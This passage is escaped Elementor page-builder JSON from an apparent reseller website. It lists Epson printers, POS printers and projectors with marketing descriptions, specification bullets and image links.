anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":164,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0c8225a\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson AcuLaser C9300N<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ee8d71a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"18\",\"bottom\":\"18\",\"left\":\"18\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e06a550\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/h4><p><br \\/><br \\/>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"3432510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"47\",\"right\":\"47\",\"bottom\":\"47\",\"left\":\"47\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/h4><p><img class=\\\"wp-image-2428 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ecb5d15\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"39\",\"right\":\"39\",\"bottom\":\"39\",\"left\":\"39\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T88V-i\\u00a0<\\/strong>\\n\\n<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/h4>\\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\\n<ul>\\n \\t<li>Printing speed of up to 300mm\\/second<\\/li>\\n \\t<li>20 million lines for printer mechanism<\\/li>\\n \\t<li>Up to 2 million for auto-cutter<\\/li>\\n \\t<li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li>\\n \\t<li>Control peripherals easily<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson TM-T70II\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><br \\/><br \\/><\\/h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f74e5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"77\",\"bottom\":\"77\",\"left\":\"77\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson LightScene EV-105<\\/strong><\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b9132fb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5a3decf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ccb5acc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"45f89fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e7ec2bf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ULTRA PORTABLE<\\/h3><p><strong>Epson EB-1785W\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2438\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-1785W.png\\\" alt=\\\"\\\" width=\\\"236\\\" height=\\\"133\\\" \\/><\\/p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.<\\/p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens<\\/li><li>WXGA Resolution<\\/li><li>Real-Time Auto Keystone Correction<\\/li><li>Split Screen Projection<\\/li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 